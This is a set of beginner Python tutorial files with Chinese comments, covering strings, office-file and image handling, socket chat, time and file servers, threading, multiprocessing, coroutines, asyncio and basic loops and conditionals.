sentence = 'You go your way I will go mine' words_list = sentence.split() print(words_list) email = ' [email protected] ' print(email) print(email.strip()) print(email.lstrip()) # 将文本放入系统剪切板中 pyperclip.copy('老虎不发猫你当我病危呀') # 从系统剪切板获得文本 # print(pyperclip.paste()) File: Day01-15/code/Day15/word1.py """ 创建Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/pdf1.py """ 创建PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/excel1.py """ 创建Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import Workbook from openpyxl.worksheet.table import Table, TableStyleInfo workbook = Workbook() sheet = workbook.active data = [ [1001, '白元芳', '男', '13123456789'], [1002, '白洁', '女', '13233445566'] ] sheet.append(['学号', '姓名', '性别', '电话']) for row in data: sheet.append(row) tab = Table(displayName="Table1", ref="A1:E5") tab.tableStyleInfo = TableStyleInfo( name="TableStyleMedium9", showFirstColumn=False, showLastColumn=False, showRowStripes=True, showColumnStripes=True) sheet.add_table(tab) workbook.save('./res/全班学生数据.xlsx') File: Day01-15/code/Day15/excel2.py """ 读取Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import load_workbook from openpyxl import Workbook workbook = load_workbook('./res/学生明细表.xlsx') print(workbook.sheetnames) sheet = workbook[workbook.sheetnames[0]] print(sheet.title) for row in range(2, 7): for col in range(65, 70): cell_index = chr(col) + str(row) print(sheet[cell_index].value, end='\t') print() File: Day01-15/code/Day15/pdf2.py """ 读取PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PyPDF2 import PdfFileReader with open('./res/Python课程大纲.pdf', 'rb') as f: reader = PdfFileReader(f, strict=False) print(reader.numPages) if reader.isEncrypted: reader.decrypt('') current_page = reader.getPage(5) print(current_page) print(current_page.extractText()) File: Day01-15/code/Day15/pillow1.py """ 使用pillow操作图像 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PIL import Image img = Image.open('./res/guido.jpg') print(img.size) print(img.format) print(img.format_description) img.save('./res/guido.png') img2 = Image.open('./res/guido.png') img3 = img2.crop((335, 435, 430, 615)) for x in range(4): for y in range(5): img2.paste(img3, (95 * y , 180 * x)) img2.resize((img.size[0] // 2, img.size[1] // 2)) img2.rotate(90) img2.save('./res/guido2.png') File: Day01-15/code/Day15/word2.py """ 读取Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from docx import Document doc = Document('./res/用函数还是用复杂的表达式.docx') print(len(doc.paragraphs)) print(doc.paragraphs[0].text) # print(doc.paragraphs[1].runs[0].text) content = [] for para in doc.paragraphs: content.append(para.text) print(''.join(content)) File: Day01-15/code/Day14/fileclient.py from socket import socket from json import loads from base64 import b64decode def main(): client = socket() client.connect(('192.168.1.2', 5566)) # 定义一个保存二进制数据的对象 in_data = bytes() # 由于不知道服务器发送的数据有多大每次接收1024字节 data = client.recv(1024) while data: # 将收到的数据拼接起来 in_data += data data = client.recv(1024) # 将收到的二进制数据解码成JSON字符串并转换成字典 # loads函数的作用就是将JSON字符串转成字典对象 my_dict = loads(in_data.decode('utf-8')) filename = my_dict['filename'] filedata = my_dict['filedata'].encode('utf-8') with open('/Users/Hao/' + filename, 'wb') as f: # 将base64格式的数据解码成二进制数据并写入文件 f.write(b64decode(filedata)) print('图片已保存.') if __name__ == '__main__': main() File: Day01-15/code/Day14/chatserver.py from socket import socket from threading import Thread def main(): class ClientHandler(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): try: while True: try: data = self._client.recv(1024) if data.decode('utf-8') == 'byebye': clients.remove(self._client) self._client.close() break else: for client in clients: client.send(data) except Exception as e: print(e) clients.remove(self._client) break except Exception as e: print(e) server = socket() server.bind(('10.7.189.118', 12345)) server.listen(512) clients = [] while True: curr_client, addr = server.accept() print(addr[0], '连接到服务器.') clients.append(curr_client) ClientHandler(curr_client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/fileserver.py from socket import socket, SOCK_STREAM, AF_INET from base64 import b64encode from json import dumps from threading import Thread def main(): # 自定义线程类 class FileTransferHandler(Thread): def __init__(self, cclient): super().__init__() self.cclient = cclient def run(self): my_dict = {} my_dict['filename'] = 'guido.jpg' # JSON是纯文本不能携带二进制数据 # 所以图片的二进制数据要处理成base64编码 my_dict['filedata'] = data # 通过dumps函数将字典处理成JSON字符串 json_str = dumps(my_dict) # 发送JSON字符串 self.cclient.send(json_str.encode('utf-8')) self.cclient.close() # 1.创建套接字对象并指定使用哪种传输服务 server = socket() # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 5566)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') with open('guido.jpg', 'rb') as f: # 将二进制数据处理成base64再解码成字符串 data = b64encode(f.read()).decode('utf-8') while True: client, addr = server.accept() # 用一个字典(键值对)来保存要发送的各种数据 # 待会可以将字典处理成JSON格式在网络上传递 FileTransferHandler(client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket4.py """ 套接字 - 基于UDP协议创建Echo客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_DGRAM) while True: data_str = input('请输入: ') client.sendto(data_str.encode('utf-8'), ('localhost', 6789)) data, addr = client.recvfrom(1024) data_str = data.decode('utf-8') print('服务器回应:', data_str) if data_str == 'bye': break client.close() File: Day01-15/code/Day14/mmdownloader.py from time import time from threading import Thread import requests class DownloadHanlder(Thread): def __init__(self, url): super().__init__() self.url = url def run(self): filename = self.url[self.url.rfind('/') + 1:] resp = requests.get(self.url) with open('/Users/Hao/Downloads/' + filename, 'wb') as f: f.write(resp.content) def main(): # 通过requests模块的get函数获取网络资源 resp = requests.get( 'http://api.tianapi.com/meinv/?key=772a81a51ae5c780251b1f98ea431b84&num=10') # 将服务器返回的JSON格式的数据解析为字典 data_model = resp.json() for mm_dict in data_model['newslist']: url = mm_dict['picUrl'] # 通过多线程的方式实现图片下载 DownloadHanlder(url).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/chatclient.py from socket import socket from threading import Thread def main(): class RefreshScreenThread(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): while running: data = self._client.recv(1024) print(data.decode('utf-8')) nickname = input('请输入你的昵称: ') myclient = socket() myclient.connect(('10.7.189.118', 12345)) running = True RefreshScreenThread(myclient).start() while running: content = input('请发言: ') if content == 'byebye': myclient.send(content.encode('utf-8')) running = False else: msg = nickname + ': ' + content myclient.send(msg.encode('utf-8')) if __name__ == '__main__': main() File: Day01-15/code/Day14/socket5.py """ 使用socketserver模块创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socketserver import TCPServer, StreamRequestHandler from time import * class EchoRequestHandler(StreamRequestHandler): def handle(self): currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) self.wfile.write(timestr.encode('utf-8')) server = TCPServer(('localhost', 6789), EchoRequestHandler) server.serve_forever() File: Day01-15/code/Day14/socket1.py """ 套接字 - 基于TCP协议创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_STREAM) server.bind(('localhost', 6789)) server.listen() print('服务器已经启动正在监听客户端连接.') while True: client, addr = server.accept() print('客户端%s:%d连接成功.' % (addr[0], addr[1])) currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) client.send(timestr.encode('utf-8')) client.close() server.close() File: Day01-15/code/Day14/timeserver.py from socket import socket, SOCK_STREAM, AF_INET from datetime import datetime def main(): # 1.创建套接字对象并指定使用哪种传输服务 # family=AF_INET - IPv4地址 # family=AF_INET6 - IPv6地址 # type=SOCK_STREAM - TCP套接字 # type=SOCK_DGRAM - UDP套接字 # type=SOCK_RAW - 原始套接字 server = socket(family=AF_INET, type=SOCK_STREAM) # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 6789)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') # 4.通过循环接收客户端的连接并作出相应的处理(提供服务) while True: # accept方法是一个阻塞方法如果没有客户端连接到服务器 # 这个方法就会阻塞代码不会向下执行 # accept方法返回元组其中的第一个元素是客户端对象 # 第二个元素是客户端的地址(由IP和端口两部分构成) client, addr = server.accept() print(str(addr) + '连接到了服务器.') # 5.发送数据 client.send(str(datetime.now()).encode('utf-8')) # 6.断开连接 client.close() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket2.py """ 套接字 - 基于TCP协议创建时间客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_STREAM) client.connect(('localhost', 6789)) while True: data = client.recv(1024) if not data: break print(data.decode('utf-8')) client.close() File: Day01-15/code/Day14/socket3.py """ 套接字 - 基于UDP协议Echo服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_DGRAM) server.bind(('localhost', 6789)) while True: data, addr = server.recvfrom(1024) server.sendto(data, addr) server.close() File: Day01-15/code/Day14/timeclient.py from socket import socket def main(): client = socket() client.connect(('10.7.152.69', 6789)) print(client.recv(1024).decode('utf-8')) client.close() if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread4.py """ 使用多线程的情况 - 耗时间的任务在独立的线程中执行 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox from threading import Thread def main(): class DownloadTaskHandler(Thread): def run(self): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') # 启用下载按钮 button1.config(state=tkinter.NORMAL) def download(): # 禁用下载按钮 button1.config(state=tkinter.DISABLED) # 通过daemon参数将线程设置为守护线程(主程序退出就不再保留执行) DownloadTaskHandler(daemon=True).start() def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', 1) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day13/singlethread1.py """ 不使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('下载完成! 耗费了%d秒' % time_to_download) def main(): start = time() download_task('Python从入门到住院.pdf') download_task('Peking Hot.avi') end = time() print('总共耗费了%.2f秒.' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread1.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' % (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程 File: Day01-15/code/Day13/generator1.py """ 生成器 - 生成器语法 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ seq = [x * x for x in range(10)] print(seq) gen = (x * x for x in range(10)) print(gen) for x in gen: print(x) num = 10 gen = (x ** y for x, y in zip(range(1, num), range(num - 1, 0, -1))) print(gen) n = 1 while n < num: print(next(gen)) n += 1 File: Day01-15/code/Day13/multithread5.py """ 多个线程共享数据 - 没有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): # 先获取锁才能执行后续的代码 self._lock.acquire() try: new_balance = self._balance + money sleep(0.01) self._balance = new_balance finally: # 这段代码放在finally中保证释放锁的操作一定要执行 self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕∫ for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/multiprocess1.py """ 使用Process类创建多个进程 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ # 通过下面程序的执行结果可以证实 父进程在创建子进程时复制了进程及其数据结构 # 每个进程都有自己独立的内存空间 所以进程之间共享数据只能通过IPC的方式 from multiprocessing import Process, Queue, current_process from time import sleep def sub_task(content, counts): print(f'PID: {current_process().pid}') counter = 0 while counter < counts: counter += 1 print(f'{counter}: {content}') sleep(0.01) def main(): number = random.randrange(5, 10) Process(target=sub_task, args=('Ping', number)).start() Process(target=sub_task, args=('Pong', number)).start() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio1.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # import time @asyncio.coroutine def hello(): print('%s: hello, world!' % threading.current_thread()) # 休眠不会阻塞主线程因为使用了异步I/O操作 # 注意有yield from才会等待休眠操作执行完成 yield from asyncio.sleep(2) # asyncio.sleep(1) # time.sleep(1) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) print('game over!') loop.close() File: Day01-15/code/Day13/coroutine1.py """ 使用协程 - 模拟快递中心派发快递 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from random import random def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' % (man_id, pkg)) sleep(random() * 3) def package_center(deliver_man, max_per_day): num = 1 deliver_man.send(None) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 sleep(0.1) deliver_man.close() print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) # 两个函数虽然没有调用关系但是创建快递员的函数作为一个协程协助了快递中心函数完成任务 # 想一想如果有多个快递员的时候应该如何处理 File: Day01-15/code/Day13/multiprocess4.py from time import time def main(): total = 0 number_list = [x for x in range(1, 100000001)] start = time() for number in number_list: total += number print(total) end = time() print('Execution time: %.3fs' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/test2.py import time from threading import Thread, Lock class Account(object): def __init__(self, balance=0): self._balance = balance self._lock = Lock() @property def balance(self): return self._balance def deposit(self, money): # 当多个线程同时访问一个资源的时候 就有可能因为竞争资源导致资源的状态错误 # 被多个线程访问的资源我们通常称之为临界资源 对临界资源的访问需要加上保护 if money > 0: self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: self._lock.release() class AddMoneyThread(Thread): def __init__(self, account): super().__init__() self._account = account def run(self): self._account.deposit(1) def main(): account = Account(1000) tlist = [] for _ in range(100): t = AddMoneyThread(account) tlist.append(t) t.start() for t in tlist: t.join() print('账户余额: %d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio2.py """ 异步I/O操作 - async和await Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # 通过async修饰的函数不再是普通函数而是一个协程 # 注意async和await将在Python 3.7中作为关键字出现 async def hello(): print('%s: hello, world!' % threading.current_thread()) await asyncio.sleep(2) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/coroutine2.py """ 使用协程 - 查看协程的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from inspect import getgeneratorstate def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' % (man_id, pkg)) sleep(0.5) def package_center(deliver_man, max_per_day): num = 1 # 创建状态(GEN_CREATED) - 等待开始执行 print(getgeneratorstate(deliver_man)) deliver_man.send(None) # 挂起状态(GEN_SUSPENDED) - 在yield表达式处暂停 print(getgeneratorstate(deliver_man)) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 deliver_man.close() # 结束状态(GEN_CLOSED) - 执行完毕 print(getgeneratorstate(deliver_man)) print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) File: Day01-15/code/Day13/multiprocess3.py """ 创建进程调用其他程序 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import subprocess import sys def main(): # 通过sys.argv获取命令行参数 if len(sys.argv) > 1: # 第一个命令行参数是程序本身所以从第二个开始取 for index in range(1, len(sys.argv)): try: # 通过subprocess模块的call函数启动子进程 status = subprocess.call(sys.argv[index]) except FileNotFoundError: print('不能执行%s命令' % sys.argv[index]) else: print('请使用命令行参数指定要执行的进程') if __name__ == '__main__': main() File: Day01-15/code/Day13/test3.py from random import randint from threading import Thread from time import sleep import pygame class Color(object): BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return r, g, b class Car(object): def __init__(self, x, y, color): self._x = x self._y = y self._color = color def move(self): if self._x + 80 < 950: self._x += randint(1, 10) def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, 80, 40), 0) def main(): class BackgroundTask(Thread): def run(self): while True: screen.fill(Color.GRAY) pygame.draw.line(screen, Color.BLACK, (130, 0), (130, 600), 4) pygame.draw.line(screen, Color.BLACK, (950, 0), (950, 600), 4) for car in cars: car.draw(screen) pygame.display.flip() sleep(0.05) for car in cars: car.move() cars = [] for index in range(5): temp = Car(50, 50 + 120 * index, Color.random_color()) cars.append(temp) pygame.init() screen = pygame.display.set_mode((1000, 600)) BackgroundTask(daemon=True).start() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio3.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio async def wget(host): print('wget %s...' % host) connect = asyncio.open_connection(host, 80) # 异步方式等待连接结果 reader, writer = await connect header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host writer.write(header.encode('utf-8')) # 异步I/O方式执行写操作 await writer.drain() while True: # 异步I/O方式执行读操作 line = await reader.readline() if line == b'\r\n': break print('%s header > %s' % (host, line.decode('utf-8').rstrip())) writer.close() loop = asyncio.get_event_loop() # 通过生成式语法创建一个装了三个协程的列表 hosts_list = ['www.sina.com.cn', 'www.sohu.com', 'www.163.com'] tasks = [wget(host) for host in hosts_list] # 下面的方法将异步I/O操作放入EventLoop直到执行完毕 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/multiprocess2.py """ 实现进程间的通信 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import multiprocessing import os def sub_task(queue): print('子进程进程号:', os.getpid()) counter = 0 while counter < 1000: queue.put('Pong') counter += 1 if __name__ == '__main__': print('当前进程号:', os.getpid()) queue = multiprocessing.Queue() p = multiprocessing.Process(target=sub_task, args=(queue,)) p.start() counter = 0 while counter < 1000: queue.put('Ping') counter += 1 p.join() print('子任务已经完成.') for _ in range(2000): print(queue.get(), end='') File: Day01-15/code/Day13/multithread2.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from threading import Thread from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('%s下载完成! 耗费了%d秒' % (filename, time_to_download)) def main(): start = time() thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',)) thread1.start() thread2 = Thread(target=download_task, args=('Peking Hot.avi',)) thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/generator2.py """ 生成器 - 使用yield关键字 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ def fib(num): n, a, b = 0, 0, 1 while n < num: yield b a, b = b, a + b n += 1 for x in fib(20): print(x) File: Day01-15/code/Day13/multithread6.py """ 多个线程共享数据 - 有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import threading class Account(object): def __init__(self): self._balance = 0 self._lock = threading.Lock() def deposit(self, money): # 获得锁后代码才能继续执行 self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: # 操作完成后一定要记着释放锁 self._lock.release() @property def balance(self): return self._balance if __name__ == '__main__': account = Account() # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): threading.Thread(target=account.deposit, args=(1,)).start() # 等所有存款的线程都执行完毕 time.sleep(2) print('账户余额为: ¥%d元' % account.balance) # 想一想结果为什么不是我们期望的100元 File: Day01-15/code/Day13/singlethread2.py """ 不使用多线程的情况 - 耗时间的任务阻塞主事件循环 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox def download(): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') def main(): top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', True) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() # 在不使用多线程的情况下 一旦点击下载按钮 由于该操作需要花费10秒中的时间 # 整个主消息循环也会被阻塞10秒钟无法响应其他的事件 # 事实上 对于没有因果关系的子任务 这种顺序执行的方式并不合理 File: Day01-15/code/Day13/multithread3.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import threading class DownloadTask(threading.Thread): def __init__(self, filename): super().__init__() self._filename = filename def run(self): print('开始下载%s...' % self._filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % self._filename) def main(): start = time() # 将多个下载任务放到多个线程中执行 # 通过自定义的线程类创建线程对象 线程启动后会回调执行run方法 thread1 = DownloadTask('Python从入门到住院.pdf') thread1.start() thread2 = DownloadTask('Peking Hot.avi') thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() # 请注意通过threading.Thread创建的线程默认是非守护线程 File: Day01-15/code/Day04/for2.py """ 用for循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(2, 101, 2): sum += x print(sum) File: Day01-15/code/Day04/for6.py """ 打印各种三角形图案 * ** *** **** ***** * ** *** **** ***** * *** ***** ******* ********* Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ row = int(input('请输入行数: ')) for i in range(row): for _ in range(i + 1): print('*', end='') print() for i in range(row): for j in range(row): if j < row - i - 1: print(' ', end='') else: print('*', end='') print() for i in range(row): for _ in range(row - i - 1): print(' ', end='') for _ in range(2 * i + 1): print('*', end='') print() File: Day01-15/code/Day04/while1.py """ 用while循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 num = 1 while num <= 100: sum += num num += 1 print(sum) File: Day01-15/code/Day04/for3.py """ 输入非负整数n计算n! Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ n = int(input('n = ')) result = 1 for x in range(1, n + 1): result *= x print('%d! = %d' % (n, result)) File: Day01-15/code/Day04/while2.py """ 用while循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum, num = 0, 2 while num <= 100: sum += num num += 2 print(sum) File: Day01-15/code/Day04/for4.py """ 输入一个正整数判断它是不是素数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ from math import sqrt num = int(input('请输入一个正整数: ')) end = int(sqrt(num)) is_prime = True for x in range(2, end + 1): if num % x == 0: is_prime = False break if is_prime and num != 1: print('%d是素数' % num) else: print('%d不是素数' % num) File: Day01-15/code/Day04/for1.py """ 用for循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(1, 101): sum += x print(sum) File: Day01-15/code/Day04/for5.py """ 输入两个正整数计算最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ x = int(input('x = ')) y = int(input('y = ')) if x > y: (x, y) = (y, x) for factor in range(x, 0, -1): if x % factor == 0 and y % factor == 0: print('%d和%d的最大公约数是%d' % (x, y, factor)) print('%d和%d的最小公倍数是%d' % (x, y, x * y // factor)) break File: Day01-15/code/Day03/tax.py """ 输入月收入和五险一金计算个人所得税 说明:写这段代码时新的个人所得税计算方式还没有颁布 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ salary = float(input('本月收入: ')) insurance = float(input('五险一金: ')) diff = salary - insurance - 3500 if diff <= 0: rate = 0 deduction = 0 elif diff < 1500: rate = 0.03 deduction = 0 elif diff < 4500: rate = 0.1 deduction = 105 elif diff < 9000: rate = 0.2 deduction = 555 elif diff < 35000: rate = 0.25 deduction = 1005 elif diff < 55000: rate = 0.3 deduction = 2755 elif diff < 80000: rate = 0.35 deduction = 5505 else: rate = 0.45 deduction = 13505 tax = abs(diff * rate - deduction) print('个人所得税: ¥%.2f元' % tax) print('实际到手收入: ¥%.2f元' % (diff + 3500 - tax)) File: Day01-15/code/Day03/conversion.py """ 英制单位英寸和公制单位厘米互换 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ value = float(input('请输入长度: ')) unit = input('请输入单位: ') if unit == 'in' or unit == '英寸': print('%f英寸 = %f厘米' % (value, value * 2.54)) elif unit == 'cm' or unit == '厘米': print('%f厘米 = %f英寸' % (value, value / 2.54)) else: print('请输入有效的单位') File: Day01-15/code/Day03/rolldice.py """ 掷骰子决定做什么事情 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ from random import randint face = randint(1, 6) if face == 1: result = '唱首歌' elif face == 2: result = '跳个舞' elif face == 3: result = '学狗叫' elif face == 4: result = '做俯卧撑' elif face == 5: result = '念绕口令' else: result = '讲冷笑话' print(result) File: Day01-15/code/Day03/triangle.py """ 判断输入的边长能否构成三角形 如果能则计算出三角形的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ import math a = float(input('a = ')) b = float(input('b = ')) c = float(input('c = ')) if a + b > c and a + c > b and b + c > a: print('周长: %f' % (a + b + c)) p = (a + b + c) / 2 area = math.sqrt(p * (p - a) * (p - b) * (p - c)) print('面积: %f' % (area)) else: print('不能构成三角形') File: Day01-15/code/Day03/verify.py """ 用户身份验证 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ # import getpass # from getpass import getpass # from getpass import * username = input('请输入用户名: ') password = input('请输入口令: ') # 输入口令的时候终端中没有回显 # password = getpass.getpass('请输入口令: ') if username == 'admin' and password == '123456': print('身份验证成功!') else: print('身份验证失败!') File: Day01-15/code/Day03/piecewise.py """ 分段函数求值 3x - 5 (x > 1) f(x) = x + 2 (-1 <= x <= 1) 5x + 3 (x < -1) Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ x = float(input('x = ')) if x > 1: y = 3 * x - 5 elif x >= -1: y = x + 2 else: y = 5 * x + 3 print('f(%.2f) = %.2f' % (x, y)) File: Day01-15/code/Day03/grade.py """ 百分制成绩转等级制成绩 90分以上,输出A 80分~89分,输出B 70分~79分,输出C 60分~69分,输出D 60分以下,输出E Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ score = float(input('请输入成绩: ')) if score >= 90: grade = 'A' elif score >= 80: grade = 'B' elif score >= 70: grade = 'C' elif score >= 60: grade = 'D' else: grade = 'E' print('对应的等级是:', grade) File: Day01-15/code/Day02/variable2.py """ 将input函数输入的数据保存在变量中并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day02/leap.py """ 输入年份 如果是闰年输出True 否则输出False Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ year = int(input('请输入年份: ')) # 如果代码太长写成一行不便于阅读 可以使用\或()折行 is_leap = (year % 4 == 0 and year % 100 != 0 or year % 400 == 0) print(is_leap) File: Day01-15/code/Day02/variable3.py """ 格式化输出 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print('%d + %d = %d' % (a, b, a + b)) print('%d - %d = %d' % (a, b, a - b)) print('%d * %d = %d' % (a, b, a * b)) print('%d / %d = %f' % (a, b, a / b)) print('%d // 